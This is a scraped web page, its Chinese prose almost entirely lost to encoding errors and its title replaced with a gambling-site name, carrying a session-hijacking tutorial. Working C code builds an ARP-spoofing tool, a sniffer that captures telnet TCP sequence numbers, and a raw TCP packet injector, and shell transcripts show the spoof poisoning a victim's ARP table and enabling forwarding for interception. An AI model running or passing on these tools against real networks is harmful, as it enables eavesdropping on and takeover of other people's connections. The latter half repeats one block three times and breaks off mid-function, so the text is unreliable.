?ຣ??վ???衢?????ƹ???õĹ?˾--?????ߵ???վ????ר??,????????绰????ϵ???ǣ?0971-8235355   
?ຣ??????վ???衢??վ??????˾-???????Ƶ?????Ϣ???????޹?˾
??ҳ |  ??˾??? |  ??վ???? |  ?????ƹ? |  ?ռ????? |  ????ע?? |  ??ҵ?ʾ? |  ???簲ȫ |  ??վ??? |  ?ͷ????? |  ??ϵ???? |  ?˲???Ƹ
 
??????????????վ????????չʾ
Lastest Project
 
??ǰλ??Ϊ????ҳ >> ?ڿ͹??? >> ????  
龙8国际乐_龙8国际娱乐电脑版_龙8国际娱城手机版

??????Դ?? ???????Ƶ?????Ϣ???????޹?˾     ????ʱ?䣺2009-4-15    ?????????8192   

һ ?Ự?ٳ??Ľ???
????
???????ںܶ?ϵͳ???????е?¼???Dz???ȫ?ģ??ͺ???telnet??rlogin??û?н??м??ܵ?ͨѶ????д???п??Գ?Ϊ???ǹ????Ķ???????û?м??ܣ? ?????׾Ϳ??ܱ??˼????????С????߽ٳ֡???????Ҳ?кܶ?????Ķ????????????ľ?Ҫ??hunt?ˣ? ????dns hijacker, juggernaut?ȣ?
????
????????ʾ??ͼ??
????
???? ____________ _____________
????
???? | | hijacking | |
????
???? | ??????A ------------------------------- ???ٳ???B |
????
???? |__________| | |____________|
????
???? 192.168.25.3 | 192.168.25.4
????
???? |
????
???? __________
????
???? | |
????
???? | Router |
????
???? |________|
????
???? |
????
???? |
????
???? __________
????
???? | |
????
???? | Router |
????
???? |________|
????
???? |
????
???? |
????
???? |
????
???? ____________
????
???? | |
????
???? | ??Χ????C | 192.168.25.1
????
???? |__________|
????
??????
????
??????
????
????A??B??ͬһ?????򣬵?B??????C??ʱ?? A????B??C֮??????߽??м?????????Ҫ????A?϶?B??C????arp spoof, ?????Ļ??? B??C֮??ĶԻ??? ?ͽ???A????????ʱ????A?ϾͿ??Զ?B??C?ĶԻ????м??????ǶԻ??ٳ֡? ???Խ???arp spoof???????кö࣬ dsniff?????arpspoof, arp-sk???arpspoof???Ǻ??õĹ???.

???ߣ? ½??   ?ظ????ڣ?2003-5-24 3:12:00
?????? Arp??ƭ??ԭ??
???? _________________________________________________________________
????
???? | | | | | |
????
???? | Destination MAC | Source MAC | Type | Payload | Checksum |
????
???? |___________________|______________|______|_________|___________|
????
???? Ethernet Frame
????
???? _________________________________________________________________
????
???? | | |
????
???? | Hardware Type | Protocol type |
????
???? |---------------------------------------------------------------|
????
???? | HW addr lth | P addr lth | Op code |
????
???? |---------------------------------------------------------------|
????
???? | Source hardware address |
????
???? |---------------------------------------------------------------|
????
???? | Source protocol address |
????
???? |---------------------------------------------------------------|
????
???? | Destination hardware address |
????
???? |---------------------------------------------------------------|
????
???? | Destination protocol address |
????
???? |_______________________________________________________________|
????
???? Arp Message
????
??????
????
????????????ץ??һ??arp??.
????
????
????
????Packet #1448, Direction: Out, Time:13:24:00.359, Size: 42
????Ethernet II
????Destination MAC: FF:FF:FF:FF:FF:FF |
????Source MAC: 00:01:02:E1:35:84 |------------ Ethernet Frame
????Ethertype: 0x0806 (2054) - ARP |
????ARP
????Hardware: 0x0001 (1) - Ethernet |
????Protocol: 0x0800 (2048) - IP |
????Hardware address length: 0x06 (6) |
????Protocol address length: 0x04 (4) |
????Operation: 0x0001 (1) - ARP Request |------------ Arp Message
????Sender MAC address: 00:01:02:E1:35:84 |
????Sender IP address: 192.168.25.1 |
????Target MAC address: 00:00:00:00:00:00
????Target IP address: 192.168.25.3 |
??????
????
????Raw Data:
????0x0000 FF FF FF FF FF FF 00 01-02 E1 35 84 08 06 00 01 ??????...??...
????0x0010 08 00 06 04 00 01 00 01-02 E1 35 84 C0 A8 19 01 .........????.
????0x0020 00 00 00 00 00 00 C0 A8-19 03 ......??..
????????һ??????ڱ????ϵõ????˵?MAC?? Ϊʲô?أ? ??Ϊ???Լ??ĵ??????и?arp cache?? ?????????֪???ĵ??Ե?MAC.
????
??????
????
??????
????
????[root@chi chi]# /sbin/arp -e
???? Address HWtype HWaddress Flags Mask Iface
????192.168.25.1 ether 00:01:02:E1:35:84 C eth0
????[root@chi chi]# ping 192.168.25.2
????PING 192.168.25.2 (192.168.25.2) from 192.168.25.3 : 56(84) bytes of data.
????Warning: time of day goes back (-795us), taking countermeasures.
????64 bytes from 192.168.25.2: icmp_seq=1 ttl=128 time=3.89 ms
????64 bytes from 192.168.25.2: icmp_seq=2 ttl=128 time=3.76 ms
????64 bytes from 192.168.25.2: icmp_seq=3 ttl=128 time=0.969 ms
????
????--- 192.168.25.2 ping statistics ---
????3 packets transmitted, 3 received, 0% loss, time 2014ms
????rtt min/avg/max/mdev = 0.969/2.876/3.897/1.350 ms
????[root@chi chi]# /sbin/arp -e
???? Address HWtype HWaddress Flags Mask Iface
????192.168.25.1 ether 00:01:02:E1:35:84 C eth0
????192.168.25.2 ether 00:02:44:33:51:24 C eth0
????[root@chi chi]#
??????
????
?????????????????û??192.168.25.2??mac?ģ? ??ʱ?? ????ping??192.168.25.2?? ??arp?Ϳ??Բ鵽192.168.25.2??MAC?ˡ?????Ҫ????ij̨??????ʱ????ĵ??Ծͻ???arp cache??鿴??û?к????ip??Ӧ??mac??????еĻ???ȡ???????????ӣ? ???û?оͷ???arp request?????õ?MAC, ???ǵ????Զ???ɵ?.???????arp cache???????ǵĹ???????.
????
??????
????
??????Ҫ????arp spoof ??ʱ???һ??Ҫ??Ҫ????Ҫ??ƭ??ip??mac?????????????????Լ???mac??. Ҫ?õ???ĵ?mac?? Ҫ?õ?ioctl.h???ͷ?ļ??? ???????????????
????
??????
????
????/********************************* arp_cache_lookup.c ***************************************/
????
??????
????
????#include <sys/types.h>
????#include <sys/socket.h>
????#include <netinet/in.h>
????#include <netinet/if_ether.h>
????#include <sys/ioctl.h>
????
????#include <libnet.h>
????
????int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether)
????{
????int sock;
????struct arpreq ar;
????struct sockaddr_in *sin;
????
????memset((char *)&ar,0, sizeof(ar));
????
????strncpy(ar.arp_dev,??eth0??,sizeof(ar.arp_dev));
????
????sin = (struct sockaddr_in *)&ar.arp_pa;
????sin->sin_family = AF_INET;
????sin->sin_addr.s_addr = ip;
????
????if((sock = socket(AF_INET,SOCK_DGRAM,0)) == -1)
????{
????printf(??socket failt\n??;
????return -1;
????}
????
????
????if(ioctl(sock,SIOCGARP,(caddr_t)&ar) == -1) {
????printf(??no mac found\n??;
????close(sock);
????return -1;
????}
????
????close(sock);
????memcpy(ether->ether_addr_octet,ar.arp_ha.sa_data,ETHER_ADDR_LEN);
????
????return 0;
????}
????
????int main(int arpc, char *argv[])
????{
????in_addr_t target_ip;
????struct ether_addr *target_mac;
????int c;
????
????target_ip = libnet_name_resolve(argv[1],1);
????arp_cache_lookup(target_ip,target_mac);
????
????printf(??MAC address: ??;
????for (c = 0; c < 6; c++)
????{
????printf(??%0.2x??, target_mac->ether_addr_octet[c]);
????if(c < 5)
????printf(??:??;
????}
????printf(??\n??;
????}
????
??????
????
????/******************************************************************************/
?????????????п???:
????
??????
????
????[root@chi chi]# gcc `libnet-config --defines` -o arp_cache_lookup arp_cache_lookup.c `libnet-config --libs`
????[root@chi chi]# ./arp_cache_lookup 192.168.25.2
????no mac found
????MAC address: 00:00:00:00:01:00 (????û??mac)
????[root@chi chi]# ./arp_cache_lookup 192.168.25.1
????MAC address: 00:01:02:e1:35:84
????Aborted
????[root@chi chi]# ping 192.168.25.2
????PING 192.168.25.2 (192.168.25.2) from 192.168.25.3 : 56(84) bytes of data.
????64 bytes from 192.168.25.2: icmp_seq=1 ttl=128 time=3.75 ms
????64 bytes from 192.168.25.2: icmp_seq=2 ttl=128 time=2.50 ms
????
????--- 192.168.25.2 ping statistics ---
????2 packets transmitted, 2 received, 0% loss, time 1013ms
????rtt min/avg/max/mdev = 2.507/3.129/3.752/0.625 ms
????[root@chi chi]# ./arp_cache_lookup 192.168.25.2
????MAC address: 00:02:44:33:51:24 (???????ˣ?
????Aborted
????[root@chi chi]#
????
??????
????
????????????Ҫ?ȼ?һ??udp??socket?????ӣ? ????arp_cache_lookup???鿴?? ?????͵õ??ˣ???Ҫ??mac?ˣ?????????????????Ҫ?????ƭ????
????
??????
????
????Arp reply Pakcet
????
????Packet #65, Direction: In, Time:23:21:44.964, Size: 60
????Ethernet II
????Destination MAC: 00:01:02:E1:35:84 Ŀ???mac???????? 192.168.25.1??mac
????Source MAC: 00:50:56:46:40:41 ????????????Լ???mac?? ??192.168.25.3
????Ethertype: 0x0806 (2054) - ARP
????ARP
????Hardware: 0x0001 (1) - Ethernet
????Protocol: 0x0800 (2048) - IP
????Hardware address length: 0x06 (6)
????Protocol address length: 0x04 (4)
????Operation: 0x0002 (2) - ARP Response ?????ʾARP Reply
????Sender MAC address: 00:50:56:46:40:41 ?????Լ???mac
????Sender IP address: 192.168.25.4 Ҫ??192.168.25.1??????ƭ??ip
????Target MAC address: 00:01:02:E1:35:84 192.168.25.1??mac
????Target IP address: 192.168.25.1 ??ƭ?????ip
????Raw Data:
????0x0000 00 01 02 E1 35 84 00 50-56 46 40 41 08 06 00 01 ...??PVF@A....
????0x0010 08 00 06 04 00 02 00 50-56 46 40 41 C0 A8 19 04 .......PVF@A??..
????0x0020 00 01 02 E1 35 84 C0 A8-19 01 03 40 42 7D 00 40 ...????..@B}.@
????0x0030 40 86 04 08 00 00 00 00-98 90 02 42 @?.....??.B
????
??????
????
????????????? ??arp_spoof?ij???.
????
????/************************************************************************/
#include <sys/types.h>
????#include <sys/param.h>
????#include <sys/socket.h>
????#include <sys/ioctl.h>
????#include <string.h>
????#include <signal.h>
????#include <net/if.h>
????#include <netinet/in_systm.h>
????#include <netinet/in.h>
????#include <netinet/if_ether.h>
????#include <stdio.h>
????#include <stdlib.h>
????#include <unistd.h>
????
????#include <libnet.h>
????#include <pcap/pcap.h>
????
????struct libnet_link_int *netif;
????struct ether_addr spoof_mac, target_mac;
????in_addr_t spoof_ip,target_ip;
????char *device;
????
????void usage(void)
????{
????printf(??arp spoof\n??;
????printf(??./arp <target_ip> <spoof_ip>\n??;
????exit(1);
????}
????
????int
????send_arp_data(struct libnet_link_int *net, char *dev, int optie,
????u_char *source_mac, in_addr_t source_ip,
????u_char *dest_mac, in_addr_t dest_ip)
????{
????char ebuf[128];
????u_char pkt[60];
????
????if( (source_mac = (u_char *)libnet_get_hwaddr(net,dev,ebuf)) == 0)
????return -1;
????
????libnet_build_ethernet(dest_mac,source_mac, ETHERTYPE_ARP,NULL,0,pkt);
????
????libnet_build_arp(ARPHRD_ETHER,ETHERTYPE_IP,6,4,optie,source_mac,(u_char *)&source_ip,
????dest_mac,(u_char *)&dest_ip,NULL,0,pkt + ETH_H);
printf(?? %s send arp reply to %s\n??,
????libnet_host_lookup(source_ip,0),
????libnet_host_lookup(dest_ip,0));
????
????return (libnet_write_link_layer(net,dev,pkt,sizeof(pkt)) == sizeof(pkt));
????}
????
????int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether)
????{
????int sock;
????struct arpreq ar;
????struct sockaddr_in *sin;
????
????memset((char *)&ar,0,sizeof(ar));
????strncpy(ar.arp_dev,??eth0??,sizeof(ar.arp_dev));
????
????sin = (struct sockaddr_in *)&ar.arp_pa;
????sin->sin_family = AF_INET;
????sin->sin_addr.s_addr = ip;
????
????if(( sock = socket(AF_INET,SOCK_DGRAM,0)) < 0)
????return -1;
????
????if(ioctl(sock,SIOCGARP,(caddr_t)&ar) == -1)
????{
????close(sock);
????return -1;
????}
????
????close(sock);
????memcpy(ether->ether_addr_octet,ar.arp_ha.sa_data,6);
????
????return 0;
????}
????
????int arp_udp(in_addr_t dest_ip)
????{
????struct sockaddr_in *sin;
????int i, sock;
????
????if(( sock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0)
????return (0);
????
????memset(&sin,0,sizeof(sin));
????sin->sin_family = AF_INET;
????sin->sin_addr.s_addr = dest_ip;
????sin->sin_port = htons(67);
????
????i = sendto(sock,NULL,0,0,(struct sockaddr *)&sin,sizeof(sin));
????
????close(sock);
????
????return ( i == 0);
????}
????
????int arp_search(in_addr_t ip, struct ether_addr *ether)
????{
????int i = 0;
????
????do {
????if(arp_cache_lookup(ip,ether) == 0)
????return 0;
????
????arp_udp(ip);
????sleep(1);
????}
????while(i++ < 3);
????
????return 1;
????}
????
????int main(int argc, char *argv[])
????{
????int c;
????char ebuf[PCAP_ERRBUF_SIZE];
????
????device = NULL;
????spoof_ip = target_ip = 0;
????
????if( argc != 3)
????usage();
????
????target_ip = libnet_name_resolve(argv[1],1);
????spoof_ip = libnet_name_resolve(argv[2],1);
????
????if( (device = pcap_lookupdev(ebuf)) == NULL)
????{
????printf(??no device found\n??;
????exit(-1);
????}
????
????if( (netif = libnet_open_link_interface(device,ebuf)) == 0)
????{
????printf(?? libnet_open_link_interface() error\n??;
????exit(-1);
????}
????
????if( (arp_search(target_ip,&target_mac)) != 0)
????{
????printf(??couldn??t found arp for host %s\n??,
????libnet_host_lookup(target_ip,0));
????exit(-1);
????}
????
????for(; {
????
????send_arp_data(netif,device,ARPOP_REPLY,NULL,spoof_ip,(u_char *)&target_mac,target_ip);
????sleep(2);
????}
????
????exit(1);
????}
????
????/**************************************************************************************/
[root@chi chi]# gcc `libnet-config --defines` -o arp arp.c `libnet-config --libs` -lpcap
????[root@chi chi]# ./arp
????arp spoof
????./arp <target_ip> <spoof_ip>
????[root@chi chi]# ./arp 192.168.25.1 192.168.25.4
????192.168.25.4 send arp reply to 192.168.25.1
????192.168.25.4 send arp reply to 192.168.25.1
????192.168.25.4 send arp reply to 192.168.25.1
????192.168.25.4 send arp reply to 192.168.25.1
????192.168.25.4 send arp reply to 192.168.25.1
????~c
????
????[root@chi chi]#
????
?????Ҷ?????ij???????˱༭?? ????192.168.25.1??????ƭ?? ????????????һ????ƭǰ???arp table?ı仯.
????
????*===============================================================
??????ӭʹ?? Microsoft Telnet ????????
????*===============================================================
????C:\>arp -a ????ƭǰ??
????
????Interface: 192.168.25.1 on Interface 0x4
????
????Internet Address Physical Address Type
????192.168.25.3 00-50-56-46-40-41 dynamic
????192.168.25.4 00-50-56-46-40-68 dynamic
????
????C:\>arp -a ????ƭ??
????
????Interface: 192.168.25.1 on Interface 0x4
????Internet Address Physical Address Type
????192.168.25.3 00-50-56-46-40-41 dynamic
????192.168.25.4 00-50-56-46-40-41 dynamic
????
????Ȼ???ٶ?192.168.25.4??????ƭ?? ?????Ļ???????192.168.25.3??192.168.25.1֮???ͨѶ???ᾭ??192.168.25.3?? ??????????֮ǰ??????Ҫ??
????
????/proc/sys/net/ipv4/ip_forward???б༭. ????192.168.25.3??192.168.25.1?Ͳ??ᷢ?????˼?????.
????
????
????[root@chi chi]# cat /proc/sys/net/ipv4/ip_forward
????0
????[root@chi chi]# cat >/proc/sys/net/ipv4/ip_forward
????1
????
????[root@chi chi]# cat /proc/sys/net/ipv4/ip_forward
????1
????[root@chi chi]#
?? ?Ự?ٳ???ԭ??
????
??????
????
????Tcp Protocol :
????
??????
????
???? 0 4 8 16 19 24 32
???? -------------------------------------------------------------------------
???? | Source Port | Destination Port |
???? -------------------------------------------------------------------------
???? | Sequence Number |
???? -------------------------------------------------------------------------
???? | Acknowledgment Number |
???? -------------------------------------------------------------------------
???? | HLEN | Reserved | Code Bits | Window |
???? -------------------------------------------------------------------------
???? | Checksum | Urgent Pointer |
???? -------------------------------------------------------------------------
???? | Options | Padding |
???? -------------------------------------------------------------------------
???? | Data |
???? -------------------------------------------------------------------------
????
??????
????
????The TCP ???ĵ?????:
????
???? Source Port: Դ?????Ķ˿?
???? Destination Port: Ŀ???????˿?
???? Sequence number: ????syn?Ļ?????????ʵ?????dz?ʼ??????
???? Acknowledgment Number: ?????????ACK????λ?????ֵ??ʾһ??׼?????յİ?????????
???? Hlen: ָʾ?δ????ݿ?ʼ
???? Control Bits:
????
???? URG: Urgent Pointer;
???? ACK: Acknowledgment;
???? PSH: Push Function;
???? RST: Reset the connection;
???? SYN: Synchronize sequence numbers;
???? FIN: No more data from sender;
????
???? Window: ????
???? Checksum: У??λ
???? Urgent Pointer: ????ָ??
???? Options:
????
??????
????
????????ȥ?? ???????ص?3??Tcp??
????
????===========================================================================
Packet #4, Direction: In, Time:14:35:43.954, Size: 74
????
????TCP
????Source port: 1028
????Destination port: 23
????Sequence: 0x5AE82A25 (1525164581) <----- SEQ ??clientnr
????Acknowledgement: 0x00000000 (0)
????Header length: 0x0A (10) - 40 bytes
????Flags: SYN <----- Flags????client???͵?.
????URG: 0
????ACK: 0
????PSH: 0
????RST: 0
????SYN: 1
????FIN: 0
????Window: 0x16D0 (5840)
????Checksum: 0x1E28 (7720) - correct
????Urgent Pointer: 0x0000 (0)
????TCP Options
????Maximum Segment Size: 0x05B4 (1460)
????Sack-Permitted
????Timestamps
????Value: 0x0001D690 (120464)
????Echo Reply: 0x00000000 (0)
????Window Scale: 0x00 (0)
????Data length: 0x0 (0)
????
????
????============================================================================
????
????Packet #5, Direction: Out, Time:14:35:43.964, Size: 78
????
????TCP
????Source port: 23
????Destination port: 1028
????Sequence: 0xC9CB8F02 (3385560834) <---- SEQ ??servernr
????Acknowledgement: 0x5AE82A26 (1525164582) <---- ACK ??clientnr+1
????Header length: 0x0B (11) - 44 bytes
????Flags: SYN ACK <---- Flags: SYN ACK
????URG: 0
????ACK: 1
????PSH: 0
????RST: 0
????SYN: 1
????FIN: 0
????Window: 0x4470 (17520)
????Checksum: 0x5C34 (23604) - correct
????Urgent Pointer: 0x0000 (0)
????TCP Options
????Maximum Segment Size: 0x05B4 (1460)
????Window Scale: 0x00 (0)
????Timestamps
????Value: 0x00000000 (0)
????Echo Reply: 0x00000000 (0)
????Sack-Permitted
????Data length: 0x0 (0)
????
????
????============================================================================
????
????Packet #6, Direction: In, Time:14:35:43.964, Size: 66
????
????TCP
????Source port: 1028
????Destination port: 23
????Sequence: 0x5AE82A26 (1525164582) <---- SEQ ??clientnr+1
????Acknowledgement: 0xC9CB8F03 (3385560835) <---- ACK ??servernr+1
????Header length: 0x08 (8) - 32 bytes
????Flags: ACK <---- Flags: ACK
????URG: 0
????ACK: 1
????PSH: 0
????RST: 0
????SYN: 0
????FIN: 0
????Window: 0x16D0 (5840)
????Checksum: 0xF40D (62477) - correct
????Urgent Pointer: 0x0000 (0)
????TCP Options
????Timestamps
????Value: 0x0001D690 (120464)
????Echo Reply: 0x00000000 (0)
????Data length: 0x0 (0)
????
????============================================================================
Packet 1: Client -> Server
????
???? flags: SYN
????
???? SEQ : clientnr 1525164581
????
????Packet 2: Server -> Client
????
???? flags: SYN, ACK
????
????
???? SEQ : servernr 3385560834
????
???? ACK : clientnr+1 1525164582
????
????Packet 3: Client -> Server
????
???? flags: ACK
????
???? SEQ : clientnr+1 1525164582
????
???? ACK : servernr+1 3385560835
??????
????
??????????Щ??һ??tcp/ip?Ի???ͨѶ????. Ҫ??һ???߳̽??нٳֵĻ??? ?ҵ??Ի???SEQ??ACK??????Ҫ??.?????ҵ??˺? ?Ϳ???????????
????
???????????Լ?Ҫ????Tcp???? ???öԷ?????ִ????.??????δ???????ʾ????ҵ?һ???Ի???SEQ??ACK.
????
??????
????
??????
????
????/*****************************get_seq_ack.c***************************************/
????
??????
????
????#include <stdio.h>
????#include <stdlib.h>
????#include <string.h>
????#include <libnet.h>
????#include <pcap/pcap.h>
????#include <signal.h>
????#include <unistd.h>
????#include <sys/socket.h>
????
????#define TELNET 23
????
????u_long src_ip, dst_ip, src_port,dst_port;
????u_long seq,ack;
????
????void get_seq_ack(u_long src_ip,u_long dst_ip,u_long src_port,u_long dst_port)
????{
????pcap_t *p;
????char errbuf[PCAP_ERRBUF_SIZE];
????u_char *buf;
????struct ip iphd;
????struct tcphdr tcphd;
????int ethrhdr;
????char *device;
????
????if ( (device = pcap_lookupdev(errbuf)) == NULL )
????{
????printf(??could not found interface\n??;
????exit(-1);
????}
????else
????printf(??device = %s\n??, device);
????
????if( (p = pcap_open_live(device,65535,1,60,errbuf)) == 0)
????{
????printf(??pcap_open_live: %s\n??,errbuf);
????exit(-1);
????}
????
????if( pcap_datalink(p) == DLT_EN10MB)
????ethrhdr = 14;
????
????printf(??Connection form %s to %s \n??,
????libnet_host_lookup(src_ip,0),
????libnet_host_lookup(dst_ip,0));
????printf(??wait for SEQ/ACK :\n??;
????
????for (;
????{
????struct pcap_pkthdr pkthdr;
????
????buf = (u_char *) pcap_next(p, &pkthdr);
????if (buf)
????{
????memcpy(&iphd, buf + ethrhdr, sizeof(iphd));
????if (iphd.ip_p == IPPROTO_TCP)
????if ((iphd.ip_src.s_addr == src_ip) || (iphd.ip_dst.s_addr == dst_ip))
????{
????memcpy(&tcphd, buf + ethrhdr + sizeof(iphd), sizeof(tcphd));
????if (tcphd.th_dport == htons(dst_port))
????src_port = tcphd.th_sport;
????}
????}
????else
????continue;
????
????if (tcphd.th_flags == TH_ACK)
????{
????printf(??Got packet! SEQ = 0x%lx ACK = 0x%lx\n??, htonl(tcphd.th_seq), htonl(tcphd.th_ack));
????
????}
????else
????continue;
????pcap_close(p);
????
????printf(??source_port is %d\n??, htons(src_port));
????printf(??dest_port is %d\n??,dst_port);
????return;
????}
????}
????
????int main(int argc, char *argv[])
????{
????if( argc < 3)
????{
????printf(?? get_seq_ack.c\n??;
????printf(??./get_seq_ack <source_ip> <dest_ip>\n??;
????exit(-1);
????}
????
????src_ip = inet_addr(argv[1]);
????dst_ip = inet_addr(argv[2]);
????dst_port = atol(??TELNET??;
????
????get_seq_ack(src_ip,dst_ip,src_port,dst_port);
????
????
????}
????
????/***********************************************************************************
??????????޸????ģ?ԭ???Dz???pcap??ץ????????ץ???ı??Ľ??н??룬?????????Ack flags?ģ??ͰѰ??е?SEQ??ACKȡ?ó???.
????
?????Գ?????е??Բ??ҵ?SEQ??ACK??
????
??????
????
????[root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
????[root@chi chi]# ./get_seq_ack
????get_seq_ack.c
????./get_seq_ack <source_ip> <dest_ip>
????[root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
????device = eth0
????Connection form 192.168.25.1 to 192.168.25.4
????wait for SEQ/ACK :
????Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
????source_port is 3486
????dest_port is 23
????[root@chi chi]#
???????????SEQ = 0x4eb9d6ca ACK = 0x83005cc,?????????????????????? ???ٵġ?IP??Tcp??.
????
??????
????
????======================================================================================
????
????????ȥ????Ҫ?Ƚ?????Ҫ???͵?IP???? ??????Ip protocol????????libnet??????ip?Ǻܼ򵥵ģ?
????
????
????
????Ip protocol :
????
????
????
???? 0 4 8 16 19 24 32
???? ------------------------------------------------------------------------
???? | VERS | HLEN | Service Type | Total Length |
???? ------------------------------------------------------------------------
???? | Identification | Flags | Fragment Offset |
???? ------------------------------------------------------------------------
???? | Source IP Address |
???? ------------------------------------------------------------------------
???? | Destination IP Address |
???? ------------------------------------------------------------------------
???? | IP Options | Padding |
???? ------------------------------------------------------------------------
???? | Data |
???? ------------------------------------------------------------------------
????
??????ip packet?Ľ????ҾͲ?д???? ̫?鷳???? ???Ҿ???libnet??????ip????tcp????????㲻???Ļ???sczд??libnet?Ľ??ܣ?????д?ĺ??????Ҫ???ġ?
????
??????
????
????/******************************************************************************/
????
????Written by spwny
????
??????
????
????void
????sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
????{
????u_char *packet;
????int fd, psize;
????
????psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
????libnet_init_packet(psize, &packet);
??????
????
????if (!packet)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_init_packet failed\n??;
????fd = libnet_open_raw_sock(IPPROTO_RAW);
????if (??fd = libnet_open_raw_sock(IPPROTO_RAW)?? == -1)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_open_raw_sock failed\n??;
????
????libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
????libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
????
????if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_do_checksum failed\n??;
????libnet_write_ip(fd, packet, psize);
????libnet_close_raw_sock(fd);
????libnet_destroy_packet(&packet);
????}
????
??????
????
????/********************************************************************************/
??????????޸????ģ?ԭ???Dz???pcap??ץ????????ץ???ı??Ľ??н??룬?????????Ack flags?ģ??ͰѰ??е?SEQ??ACKȡ?ó???.
????
?????Գ?????е??Բ??ҵ?SEQ??ACK??
????
??????
????
????[root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
????[root@chi chi]# ./get_seq_ack
????get_seq_ack.c
????./get_seq_ack <source_ip> <dest_ip>
????[root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
????device = eth0
????Connection form 192.168.25.1 to 192.168.25.4
????wait for SEQ/ACK :
????Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
????source_port is 3486
????dest_port is 23
????[root@chi chi]#
???????????SEQ = 0x4eb9d6ca ACK = 0x83005cc,?????????????????????? ???ٵġ?IP??Tcp??.
????
??????
????
????======================================================================================
????
????????ȥ????Ҫ?Ƚ?????Ҫ???͵?IP???? ??????Ip protocol????????libnet??????ip?Ǻܼ򵥵ģ?
????
????
????
????Ip protocol :
????
????
????
???? 0 4 8 16 19 24 32
???? ------------------------------------------------------------------------
???? | VERS | HLEN | Service Type | Total Length |
???? ------------------------------------------------------------------------
???? | Identification | Flags | Fragment Offset |
???? ------------------------------------------------------------------------
???? | Source IP Address |
???? ------------------------------------------------------------------------
???? | Destination IP Address |
???? ------------------------------------------------------------------------
???? | IP Options | Padding |
???? ------------------------------------------------------------------------
???? | Data |
???? ------------------------------------------------------------------------
????
??????ip packet?Ľ????ҾͲ?д???? ̫?鷳???? ???Ҿ???libnet??????ip????tcp????????㲻???Ļ???sczд??libnet?Ľ??ܣ?????д?ĺ??????Ҫ???ġ?
????
??????
????
????/******************************************************************************/
????
????Written by spwny
????
??????
????
????void
????sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
????{
????u_char *packet;
????int fd, psize;
????
????psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
????libnet_init_packet(psize, &packet);
??????
????
????if (!packet)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_init_packet failed\n??;
????fd = libnet_open_raw_sock(IPPROTO_RAW);
????if (??fd = libnet_open_raw_sock(IPPROTO_RAW)?? == -1)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_open_raw_sock failed\n??;
????
????libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
????libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
????
????if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_do_checksum failed\n??;
????libnet_write_ip(fd, packet, psize);
????libnet_close_raw_sock(fd);
????libnet_destroy_packet(&packet);
????}
????
??????
????
????/********************************************************************************/
??????????޸????ģ?ԭ???Dz???pcap??ץ????????ץ???ı??Ľ??н??룬?????????Ack flags?ģ??ͰѰ??е?SEQ??ACKȡ?ó???.
????
?????Գ?????е??Բ??ҵ?SEQ??ACK??
????
??????
????
????[root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
????[root@chi chi]# ./get_seq_ack
????get_seq_ack.c
????./get_seq_ack <source_ip> <dest_ip>
????[root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
????device = eth0
????Connection form 192.168.25.1 to 192.168.25.4
????wait for SEQ/ACK :
????Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
????source_port is 3486
????dest_port is 23
????[root@chi chi]#
???????????SEQ = 0x4eb9d6ca ACK = 0x83005cc,?????????????????????? ???ٵġ?IP??Tcp??.
????
??????
????
????======================================================================================
????
????????ȥ????Ҫ?Ƚ?????Ҫ???͵?IP???? ??????Ip protocol????????libnet??????ip?Ǻܼ򵥵ģ?
????
????
????
????Ip protocol :
????
????
????
???? 0 4 8 16 19 24 32
???? ------------------------------------------------------------------------
???? | VERS | HLEN | Service Type | Total Length |
???? ------------------------------------------------------------------------
???? | Identification | Flags | Fragment Offset |
???? ------------------------------------------------------------------------
???? | Source IP Address |
???? ------------------------------------------------------------------------
???? | Destination IP Address |
???? ------------------------------------------------------------------------
???? | IP Options | Padding |
???? ------------------------------------------------------------------------
???? | Data |
???? ------------------------------------------------------------------------
????
??????ip packet?Ľ????ҾͲ?д???? ̫?鷳???? ???Ҿ???libnet??????ip????tcp????????㲻???Ļ???sczд??libnet?Ľ??ܣ?????д?ĺ??????Ҫ???ġ?
????
??????
????
????/******************************************************************************/
????
????Written by spwny
????
??????
????
????void
????sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
????{
????u_char *packet;
????int fd, psize;
????
????psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
????libnet_init_packet(psize, &packet);
??????
????
????if (!packet)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_init_packet failed\n??;
????fd = libnet_open_raw_sock(IPPROTO_RAW);
